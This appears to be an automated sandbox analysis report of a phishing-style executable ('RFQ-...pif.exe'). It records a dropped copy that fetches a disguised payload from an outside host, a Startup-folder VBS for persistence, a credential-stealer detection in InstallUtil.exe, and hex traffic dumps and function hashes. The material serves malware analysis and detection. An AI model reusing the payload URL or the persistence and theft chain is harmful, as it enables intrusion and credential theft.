2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 09 b1 b2 75 fe a4 e7 cd e0 79 ca 67 45 84 b6 80 0b c8 c0 73 00 76 2d 45 d5 c5 c5 7b b0 22 81 20 58 e0 50 9e a3 1a c8 bd 15 f2 07 3e d1 13 72 7d a2 53 3f cf db 92 7c fc fc ac ad d7 4c f3 5e d0 61 7a 0b 84 20 a9 84 87 00 ab 25 17 40 0d cf e0 ab 74 35 b8 04 61 67 db b9 25 a8 49 1f bb 4c e2 84 78 57 3a 04 71 bf fe 83 e4 b4 6f b4 a8 6a 87 1a 8e d7 67 a3 55 f8 a2 16 0b d7 9d 08 04 14 ee 34 7e 6f f1 d7 b2 f3 32 20 1f 28 79 b1 2f e5 d2 21 70 08 77 a3 d1 e9 3d 39 fa 38 a7 dd ed f3 bf d8 cb d7 af e1 35 d6 40 12 98 53 96 38 b3 ab 4d 2f 50 03 33 d1 c5 8c 84 20 6c f7 dc 42 4e 68 c5 00 d4 ba fc bd fd 0b 8d 7a a5 64 37 4a ff 64 f1 08 e7 d8 11 de 36 f4 69 b5 f8 6f 4d 46 6d c9 44 a7 ed 5d 98 2b dc ee a7 cd b2 cf 00 03 d1 74 d5 a3 67 29 2d 3b fe 6e 1b 4c 96 59 6e 23 2f be Data Ascii: uygEsv-E{" XP>r}S?\|L^az %@t5ag%ILxW:qojgU4~o2 (y/!pw=985@S8M/P3 lBNhzd7Jd6ioMFmD]+tg)-;nLYn#/
2025-01-03 00:49:55 UTC	8000	IN	Data Raw: 86 ad 83 41 2f b3 ed 44 55 54 6a 9d 8d 2b 55 27 ee da c4 e1 81 3e dd 84 8c e2 61 ae 66 75 7a 9b 7f 06 b2 63 34 a0 b7 07 5e 2a ab 89 8a b1 57 3a fb 7d 67 e1 3f 11 e2 78 c6 28 b8 9f 37 a7 e8 15 6a b5 e9 59 33 60 e0 c3 24 a3 46 7d cc cf c2 18 e5 c1 75 ce b0 98 87 51 94 2d 66 63 76 86 dc 52 b0 82 7e 76 f0 14 84 bb 9a e0 45 ca 8d e5 15 a9 01 f5 9e dd ac b4 c8 88 8f 43 2e ce ee 67 7b 75 d0 76 f6 d1 95 c0 38 74 2e ad 64 34 ba 37 91 1d a3 17 0e f1 dd 79 f1 f5 ff 7e 78 7d 39 b1 a1 b2 18 8c d5 e3 17 94 96 c6 c3 24 4c 38 fa fc 8d 10 2b be 34 83 3b dd 36 1b 06 1c 5a a1 a4 d0 f1 a1 77 c7 85 5a 4b 30 6e 55 8b 59 fb 03 1b 25 a7 1c 2d 17 d6 5c 06 55 e0 f4 e7 f4 c8 3b 0d 92 28 dd 8f 0c e8 8e 09 87 42 50 61 27 6c 03 0e 4f f3 25 51 78 60 44 b8 0b 50 83 2b 9d 79 7b 7c 3b 22 Data Ascii: A/DUTj+U'>afuzc4^*W:}g?x(7jY3`$F}uQ-fcvR~vEC.g{uv8t.d47y~x}9$L8+4;6ZwZK0nUY%-\U;(BPa'lO%Qx`DP+y{\|;"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	209.58.149.225	443	8136	C:\Users\user\AppData\Roaming\Count.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 00:50:19 UTC	222	OUT	GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: www.chirreeirl.com Connection: Keep-Alive
2025-01-03 00:50:19 UTC	210	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 00:50:19 GMT Server: Apache Last-Modified: Thu, 02 Jan 2025 18:16:45 GMT Accept-Ranges: bytes Content-Length: 1262600 Connection: close Content-Type: audio/mpeg
2025-01-03 00:50:19 UTC	7982	IN	Data Raw: 0c da 08 45 20 57 84 8a 02 40 d1 79 5a 3a 6b c6 b1 be 7e a2 c3 d8 bb e1 0f 22 ca e1 14 d4 ad 7c 96 ba 37 91 55 31 69 b0 28 e1 85 79 93 6a 5e 7f 04 41 e3 13 f7 11 f1 17 87 f0 26 41 69 3b c3 0d 2e 87 4f 08 47 a9 ed e1 b7 a4 3a 6c b2 0e f1 b9 73 7b f9 1c 5d 77 4f 28 71 0d 97 3f 48 1b 91 97 59 68 26 ad b2 fb bf 3a 1d d3 9d 2f 48 1a 9c 75 e1 ee ba 37 fc f2 61 dc e5 b3 11 b8 f7 8c 83 b5 cf 48 48 13 50 16 5c 64 b1 74 5f 92 12 1c f2 97 2d a0 45 0d 40 4a 15 cc b1 b7 02 48 a6 1d d7 2e 3f 68 88 80 57 d4 b9 e2 f9 4f 5c ed c3 a4 84 e7 53 64 d2 e5 f0 0c 69 a3 f0 d8 3b ea b2 e0 73 07 9d 12 c7 c3 e4 f3 77 52 d7 da d3 a4 ca 22 fb 62 90 da ed 71 e5 1f 5e 01 d5 38 41 a9 c2 1f e1 06 6b 57 a0 e9 77 33 b8 a6 bd 82 93 66 88 ff be 61 32 92 42 da d3 d6 b4 5d 74 f8 f6 df c0 6b ac Data Ascii: E W@yZ:k~"\|7U1i(yj^A&Ai;.OG:ls{]wO(q?HYh&:/Hu7aHHP\dt_-E@JH.?hWO\Sdi;swR"bq^8AkWw3fa2B]tk
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 0e 8d f6 28 f2 64 49 4f 3c 88 2f 45 4b f2 dc 9b 4f 8c bc 5c ac c5 96 b7 5e 29 ad 5b 87 f7 31 e0 d6 a0 4a 23 e7 2a 3b ae d7 86 6e 4d be f1 09 8c 3c f7 be ac dd cc f6 b5 3b 59 fc ba ea 20 8a a5 8e 37 aa 49 da 95 6a e8 2d c5 d2 0a fc 61 62 f4 d2 c6 9b e6 89 2a a0 fc 51 aa cc 80 9b ce e4 15 2f c7 2b 0f c8 ce 8a 3c 41 d0 ed 47 59 3a 58 89 49 d7 05 83 35 bc 7b 61 bf e9 b1 88 6b d7 c5 c2 18 5d 70 c3 51 5a 49 05 9c e1 5d 43 c2 6e 4a d0 6c 1a e9 da e1 44 2e 8f cd 53 c5 f8 5a c8 48 e7 10 e3 68 43 ce 7c 0b 51 0e 56 5c d3 2c 87 7b a7 c0 b5 dd b9 a2 8f ce 7f bf 11 10 fd 7a 01 d6 04 01 d2 c5 03 27 12 32 03 72 3a 6e cf 8d a1 1f 44 b8 42 60 9e 69 84 ab ed f3 f4 89 18 9f e9 b9 4c 63 43 10 cb 10 73 18 41 c1 94 19 04 8c 05 34 bd b2 4a 3a 5a a0 c0 07 20 16 20 cb 66 de d0 78 Data Ascii: (dIO</EKO\^)[1J#;nM<;Y 7Ij-abQ/+<AGY:XI5{ak]pQZI]CnJlD.SZHhC\|QV\,{z'2r:nDB`iLcCsA4J:Z fx
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 21 4d 2d ea 1f 87 b9 54 b6 3c 26 8d 02 15 9d 0a 83 b7 27 93 09 d5 ec 58 1a a2 08 56 e1 94 31 f3 d9 58 3b 55 2f b6 d3 25 e9 84 da 5d 37 a5 e8 e9 5f 34 a1 49 e9 de 14 dc d1 3a 32 ee d5 79 62 23 eb 2b 1b 7e 84 1d ab 73 22 0a e2 a7 2b 44 5e 20 0d 08 81 16 df fe c0 cd 1d 0c 78 28 d1 a3 83 27 4d 2d 49 9d 71 91 00 ad e2 a7 0b c6 61 7e e9 17 f2 77 4f 92 57 34 18 09 d4 27 48 27 94 af 95 8b d4 03 f1 99 96 9c a3 0c b1 67 60 74 89 a9 65 1f 90 51 79 0e c6 48 1f 8c 4b 87 0c 67 ff ff 6d 18 e3 e5 3b c8 f9 0c 1a 65 ea 8e b5 92 66 87 d9 58 94 70 54 74 6d b9 44 d9 4d 13 80 9a 47 88 5e dc 86 e7 a5 76 b3 48 ba 94 54 82 7a 63 67 43 6e 3c 7b f8 27 3e 3d 35 d4 27 c6 eb 83 f0 d7 2a dd 02 f5 af 9c 2e 6e c4 db 8f 4f 49 e9 8c 07 39 76 0c 81 2c 5a 6e 95 95 d4 30 2a e3 3f eb 40 ad e8 Data Ascii: !M-T<&'XV1X;U/%]7_4I:2yb#+~s"+D^ x('M-Iqa~wOW4'H'g`teQyHKgm;efXpTtmDMG^vHTzcgCn<{'>=5'.nOI9v,Zn0?@
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 5f 2d c6 9c 24 54 3d d2 29 13 48 1f 83 e6 3f 03 03 f0 dc 6f 04 81 c5 86 f4 9e a3 11 f5 6f d8 22 6d b2 0d cd fb b6 0a 0c 7b 7a 38 77 5b 21 0e 43 35 ad dd f5 be 47 4a 33 49 9a a8 16 8e e5 38 13 97 78 da a7 76 d2 de 25 7c db 71 b2 e5 d2 5e a0 ff be 38 a4 82 7e aa 76 7d df 2f f7 e4 c1 8a f8 20 78 a2 f2 0e 26 11 c7 82 42 d5 47 a7 5f 86 b2 f4 de ac 0a 26 d3 a2 73 33 bf f1 2f 06 f2 f5 68 b0 64 96 5d 34 5c 03 8d be 59 1b 89 74 11 e8 4d f5 10 5a 57 9a 03 bc f5 b8 27 b6 51 99 b3 f6 f4 e9 5b f6 f0 c4 12 f0 7e b8 83 6d 63 0a 52 80 40 cd 43 1e 05 0b 13 24 e9 f4 7d 7e 00 0d 0b c1 be 85 37 ba 13 39 8f c0 d2 76 80 f9 ac 37 1d d1 44 05 37 7a 96 98 49 9d e3 b2 83 59 d7 30 fc 1c 95 df d5 92 e3 a9 d2 74 c0 02 ca 85 b3 04 db b3 b0 7c 65 83 90 aa ba 7a 01 99 a5 ca 0e 05 e9 07 Data Ascii: _-$T=)H?oo"m{z8w[!C5GJ3I8xv%\|q^8~v}/ x&BG_&s3/hd]4\YtMZW'Q[~mcR@C$}~79v7D7zIY0t\|ez
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 69 fc d7 4d 05 10 7f 07 ee 4c 38 e9 a9 4a 9b 14 e1 7d 2c df 77 3b 27 7e 2b 2f 44 c5 68 8b da d1 95 44 fd 40 28 d0 93 e0 ef 76 67 62 3a cd f1 55 0a 61 46 6c 7d 3f 37 e8 64 41 f8 5b 42 be 9f 0d 6e 1f 5d 84 2a 65 d1 d8 8c 85 21 e9 d8 eb 7a b7 bd de 6f 04 a3 ad 76 62 3b 55 21 7d e7 f4 6b 22 35 cc b1 d1 1f 4a 94 cc 33 2d 1a a3 5e 0e b0 70 d4 82 2f fe 8f a7 a0 04 30 3c e4 47 ea 59 9b 91 2e eb ce 22 54 ee 93 d5 43 38 a0 de b2 d0 79 52 be cb a7 b7 59 d1 2c 47 00 3f fe 2c d9 b2 c5 62 33 b8 63 c2 9d 32 f3 0c eb 99 a6 0b d6 ab 56 66 18 54 6f 53 c2 27 73 c0 36 c8 25 9a a7 d4 39 48 5c 4b b1 0e 1d 24 84 ef db f7 35 8a f2 ef 8a a9 4c 2d a8 09 d6 32 10 61 6d 53 14 9d e8 98 16 30 6a f7 36 e2 e0 b1 1e 47 0d f8 42 bf ae 1f 9c ec f8 ee 43 fd 26 9a 04 f2 a4 fb 1c 3d 7f 92 28 Data Ascii: iML8J},w;'~+/DhD@(vgb:UaFl}?7dA[Bn]*e!zovb;U!}k"5J3-^p/0<GY."TC8yRY,G?,b3c2VfToS's6%9H\K$5L-2amS0j6GBC&=(
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: af 62 b5 07 93 0e 92 d9 94 b6 93 68 79 fa ab 5d 10 7a 21 80 6f b0 04 1f 38 d0 80 63 ce 64 1d ed f6 31 78 28 aa 69 f5 01 89 5e 6c ca e6 d5 b8 91 16 9c 13 b8 4d 6f 63 2c 68 e4 55 c8 c8 9b 40 8d 0a 28 25 37 ce 93 d6 eb 6b 5c 16 fc a8 eb be 6b f6 da 50 6d 6f b9 5a 88 cb 77 1f ea 4d 49 12 12 89 97 80 d6 cb e0 c5 c6 b5 54 55 45 01 13 45 6f 9b 8b 32 b6 3a 9b 2f d0 e9 23 3d fc eb 18 93 48 6d ad f3 21 b1 a7 c4 c5 43 00 c5 7f a2 62 13 3f 2f b1 e2 b5 d8 ec 39 5e 14 ed f0 f8 43 a3 65 fa 5e fa 86 05 55 1c ce 5c 36 57 f4 0b 0e 1a bb ea 31 6a 29 6f 81 4d ec cd a2 b5 aa 8d 30 9f 1e 16 98 a2 91 e0 11 48 0e ff ed bd f6 fb 14 21 65 b2 05 14 f5 3f 38 9c 1c 77 49 7e 43 69 36 d5 fa 46 e8 7c ef 87 9f 2a 48 97 11 fe 93 2c c7 31 8c 43 47 06 4f 4b 2d 2b cd 53 a5 52 88 a1 d6 83 ea Data Ascii: bhy]z!o8cd1x(i^lMoc,hU@(%7k\kPmoZwMITUEEo2:/#=Hm!Cb?/9^Ce^U\6W1j)oM0H!e?8wI~Ci6F\|*H,1CGOK-+SR
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: b9 6b e6 31 e8 9b 88 e5 ea 3c 03 62 d8 f1 e5 9f 77 c2 6d 47 f7 4c 12 63 c9 4a 07 19 21 d3 1e 48 09 9a 96 bb 58 74 aa 2c 76 72 ce 8c 8c 33 21 79 ba bf 7d cc 92 77 b1 8f dd d7 15 c1 3c 31 5f fc 90 9a 3d 4a 32 72 c9 6f 6d d3 40 c8 ad 34 69 ff 5d e6 60 79 4a 8e ee 59 90 7b 1c b5 2c 23 ba bf 29 87 b0 29 05 79 19 70 71 c7 1f e7 66 d4 b8 36 4e f8 cd 86 d3 c5 e3 19 77 a3 6d 9f aa fb cd 89 85 6c 9f cd 20 6b 83 9e 93 b3 04 a7 df 94 34 89 a2 33 92 93 6e 7c 0d fc 95 02 c0 4c 5e b2 69 c8 ef 5c 6b b7 c1 4b 8b aa e4 d4 aa 11 ad 4b f0 c0 72 e6 e0 b8 6d d2 d7 ca f3 15 e7 bc cf 03 39 09 1e 5a 4b 94 be 71 22 99 4a f6 90 6f 8b 10 b7 01 c5 69 2c ab a1 03 cc 29 18 d5 b9 99 33 a4 12 36 7d 47 a4 a7 96 43 9d 98 cf 70 bb c3 ea cb 51 ec 0a 67 e2 6b 32 b6 f0 0c 93 67 9a 86 c0 4f b5 Data Ascii: k1<bwmGLcJ!HXt,vr3!y}w<1_=J2rom@4i]`yJY{,#))ypqf6Nwml k43n\|L^i\kKKrm9ZKq"Joi,)36}GCpQgk2gO
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 60 25 52 7c 03 b1 78 52 56 47 d4 03 34 37 b9 be 6b 5f 32 54 69 33 e0 b4 f5 23 38 2b 7b 69 3d 7f 38 27 bb 18 74 eb 83 76 71 98 1a 9d 6a 2b 76 7a c4 7d df 1c 69 04 ad 29 09 38 62 fb f4 c2 65 d1 b1 48 4f d2 c5 fe aa 4f d1 a4 2d be e5 17 80 04 aa a9 46 65 f0 e0 12 f5 11 96 81 f3 d6 c2 46 d4 1d d0 e1 7e 41 c7 04 de 13 de 02 e4 86 b2 b8 30 74 e4 a8 6f 02 a7 b9 a4 62 c2 97 ba 58 de d0 a7 0c 23 09 6b 79 bc 21 55 28 e3 e9 bd 92 b3 58 ed ba a8 3e ec 38 00 c0 ca 84 60 b9 f6 c3 a7 6e 99 66 4a 50 aa 7a a8 ff 74 51 f4 af eb ff 71 e4 e8 86 05 c0 3d c0 c3 8a ea 52 c1 00 a9 0c f5 34 ff 66 e6 c9 51 5a ec 8f 2a 32 4b 15 a5 b7 75 d6 a8 25 1e 26 a5 7c ea b7 28 e5 5e c2 fc 4b 5c 64 ae 8f ec cb aa 7f 8d f6 2f f8 fe 16 f0 bd d4 4e 5b d7 52 e9 a4 d9 31 89 ba 73 57 c9 57 ce 40 5e Data Ascii: `%R\|xRVG47k_2Ti3#8+{i=8'tvqj+vz}i)8beHOO-FeF~A0tobX#ky!U(X>8`nfJPztQq=R4fQZ*2Ku%&\|(^K\d/N[R1sWW@^
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 09 b1 b2 75 fe a4 e7 cd e0 79 ca 67 45 84 b6 80 0b c8 c0 73 00 76 2d 45 d5 c5 c5 7b b0 22 81 20 58 e0 50 9e a3 1a c8 bd 15 f2 07 3e d1 13 72 7d a2 53 3f cf db 92 7c fc fc ac ad d7 4c f3 5e d0 61 7a 0b 84 20 a9 84 87 00 ab 25 17 40 0d cf e0 ab 74 35 b8 04 61 67 db b9 25 a8 49 1f bb 4c e2 84 78 57 3a 04 71 bf fe 83 e4 b4 6f b4 a8 6a 87 1a 8e d7 67 a3 55 f8 a2 16 0b d7 9d 08 04 14 ee 34 7e 6f f1 d7 b2 f3 32 20 1f 28 79 b1 2f e5 d2 21 70 08 77 a3 d1 e9 3d 39 fa 38 a7 dd ed f3 bf d8 cb d7 af e1 35 d6 40 12 98 53 96 38 b3 ab 4d 2f 50 03 33 d1 c5 8c 84 20 6c f7 dc 42 4e 68 c5 00 d4 ba fc bd fd 0b 8d 7a a5 64 37 4a ff 64 f1 08 e7 d8 11 de 36 f4 69 b5 f8 6f 4d 46 6d c9 44 a7 ed 5d 98 2b dc ee a7 cd b2 cf 00 03 d1 74 d5 a3 67 29 2d 3b fe 6e 1b 4c 96 59 6e 23 2f be Data Ascii: uygEsv-E{" XP>r}S?\|L^az %@t5ag%ILxW:qojgU4~o2 (y/!pw=985@S8M/P3 lBNhzd7Jd6ioMFmD]+tg)-;nLYn#/
2025-01-03 00:50:20 UTC	8000	IN	Data Raw: 86 ad 83 41 2f b3 ed 44 55 54 6a 9d 8d 2b 55 27 ee da c4 e1 81 3e dd 84 8c e2 61 ae 66 75 7a 9b 7f 06 b2 63 34 a0 b7 07 5e 2a ab 89 8a b1 57 3a fb 7d 67 e1 3f 11 e2 78 c6 28 b8 9f 37 a7 e8 15 6a b5 e9 59 33 60 e0 c3 24 a3 46 7d cc cf c2 18 e5 c1 75 ce b0 98 87 51 94 2d 66 63 76 86 dc 52 b0 82 7e 76 f0 14 84 bb 9a e0 45 ca 8d e5 15 a9 01 f5 9e dd ac b4 c8 88 8f 43 2e ce ee 67 7b 75 d0 76 f6 d1 95 c0 38 74 2e ad 64 34 ba 37 91 1d a3 17 0e f1 dd 79 f1 f5 ff 7e 78 7d 39 b1 a1 b2 18 8c d5 e3 17 94 96 c6 c3 24 4c 38 fa fc 8d 10 2b be 34 83 3b dd 36 1b 06 1c 5a a1 a4 d0 f1 a1 77 c7 85 5a 4b 30 6e 55 8b 59 fb 03 1b 25 a7 1c 2d 17 d6 5c 06 55 e0 f4 e7 f4 c8 3b 0d 92 28 dd 8f 0c e8 8e 09 87 42 50 61 27 6c 03 0e 4f f3 25 51 78 60 44 b8 0b 50 83 2b 9d 79 7b 7c 3b 22 Data Ascii: A/DUTj+U'>afuzc4^*W:}g?x(7jY3`$F}uQ-fcvR~vEC.g{uv8t.d47y~x}9$L8+4;6ZwZK0nUY%-\U;(BPa'lO%Qx`DP+y{\|;"

Target ID:	0
Start time:	19:49:52
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe"
Imagebase:	0x930000
File size:	25'600 bytes
MD5 hash:	07A7551DA7299874AFD2C3E299ECA83A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1794630967.0000000006980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1787752415.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:50:06
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x490000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:50:17
Start date:	02/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs"
Imagebase:	0x7ff61c040000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:50:17
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Roaming\Count.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Count.exe"
Imagebase:	0x210000
File size:	25'600 bytes
MD5 hash:	07A7551DA7299874AFD2C3E299ECA83A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2038135450.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:50:30
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x430000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.2%
Total number of Nodes:	403
Total number of Limit Nodes:	12

Executed Functions

Function 068F4610 Relevance: 16.1, Strings: 12, Instructions: 1143COMMON

Download Yara Rule

Strings

$^q, xrefs: 068F4F5A
$^q, xrefs: 068F4A77
$^q, xrefs: 068F4EF1
$^q, xrefs: 068F4F01
$^q, xrefs: 068F4B17
$^q, xrefs: 068F48A3
$^q, xrefs: 068F4F4A
$^q, xrefs: 068F4B27
$^q, xrefs: 068F4A67
4, xrefs: 068F4FF5
,bq, xrefs: 068F50DA
$^q, xrefs: 068F48B3

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: d75bd41b613f6bcd50ec740663906846277e4b7126efda1aca090e6aba0d49f5
Instruction ID: 6ea8dba850cc61a7976696254c4249fe6448a92dec4792a170490252c7ddaffa
Opcode Fuzzy Hash: d75bd41b613f6bcd50ec740663906846277e4b7126efda1aca090e6aba0d49f5
Instruction Fuzzy Hash: 33B21834A102188FDB54CFA8C894BAEB7F6BB88700F154599E605EB3A5DB71EC85CF50

Function 068F4947 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 068F4EF1
$^q, xrefs: 068F4B17
$^q, xrefs: 068F4F4A
$^q, xrefs: 068F4A67
4, xrefs: 068F4FF5
,bq, xrefs: 068F50DA

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: 52dc70761a26ab099e21c0ed0c192b54b4dbea658874351382f29717adfb9e56
Instruction ID: eacba16bf3aa800e48b0323b2fe6a3ddea70f3525f0bad6cd928da47593c95d4
Opcode Fuzzy Hash: 52dc70761a26ab099e21c0ed0c192b54b4dbea658874351382f29717adfb9e56
Instruction Fuzzy Hash: B9220A34A10218CFDB64DF64C894BADB7B2FF48304F1581AAD609EB2A5DB709D81CF51

Function 068150A8 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbaq, xrefs: 068151D5
pbq, xrefs: 06815C62
Te^q, xrefs: 068157CB
TJcq, xrefs: 0681524A

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: 259ce138e4f906cd245bc4605fae7d67b1312a262ef4d7b2785dab448145605c
Instruction ID: 4456a2c77c458cb57a14ea99a0b2680eed6bb89b39db8775c4ba36bb08e75f75
Opcode Fuzzy Hash: 259ce138e4f906cd245bc4605fae7d67b1312a262ef4d7b2785dab448145605c
Instruction Fuzzy Hash: 7BA2A475A00228CFDB64CF69C984A9DBBB2FF89304F1581E9D509AB325DB319E81CF51

Function 06817468 Relevance: 3.8, Strings: 2, Instructions: 1341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 06818456
$^q, xrefs: 06817ADA

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: 405d6269879bd57ed1475a0f27857d26da1c68cdb22244a9ad7cacf6337c895f
Instruction ID: 6b07918629b7975b07f91412aacbdcbd76b24d4581a848d388b624b9de3fe61c
Opcode Fuzzy Hash: 405d6269879bd57ed1475a0f27857d26da1c68cdb22244a9ad7cacf6337c895f
Instruction Fuzzy Hash: 36E2B474A012288FDB64DF68D884B9DB7BAFB89305F1081E9D549EB354DB34AE85CF40

Function 068F7F90 Relevance: 3.1, Strings: 2, Instructions: 639
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 068F825E
Pl^q, xrefs: 068F8178

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: Pl^q$$^q
API String ID: 0-2677662154
Opcode ID: 8023f404a6e7d41a942767b0f8b0d82be152c2fb2c5fb6424b5388db9dbfbb95
Instruction ID: 62205577da574f288b3894b3b5cb2ba4c419b365f2aa8f5d8376648141f47532
Opcode Fuzzy Hash: 8023f404a6e7d41a942767b0f8b0d82be152c2fb2c5fb6424b5388db9dbfbb95
Instruction Fuzzy Hash: C5324B74B202088FDB94DF28C948A6E77F2BF89704B1584A9E606CB375DB35EC41CB51

Function 06B00040 Relevance: 3.1, Strings: 2, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06B0015D
8, xrefs: 06B0014A

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b00000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: ad8f705aa1e075932ee4c0b9d8470676cde6aad9e3af074f292a1c69ec7183c2
Instruction ID: 48dcbbde407002aa34834aef9cc71a437a6c602997e299b15d85d0dc6ae9d9b3
Opcode Fuzzy Hash: ad8f705aa1e075932ee4c0b9d8470676cde6aad9e3af074f292a1c69ec7183c2
Instruction Fuzzy Hash: 2652B675E012298FDB64DF69C890BD9B7B5FB89300F5086E9D849A7354DB30AE81CF90

Function 06B00013 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06B0015D
h, xrefs: 06B0013E

Memory Dump Source

Source File: 00000000.00000002.1795331756.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

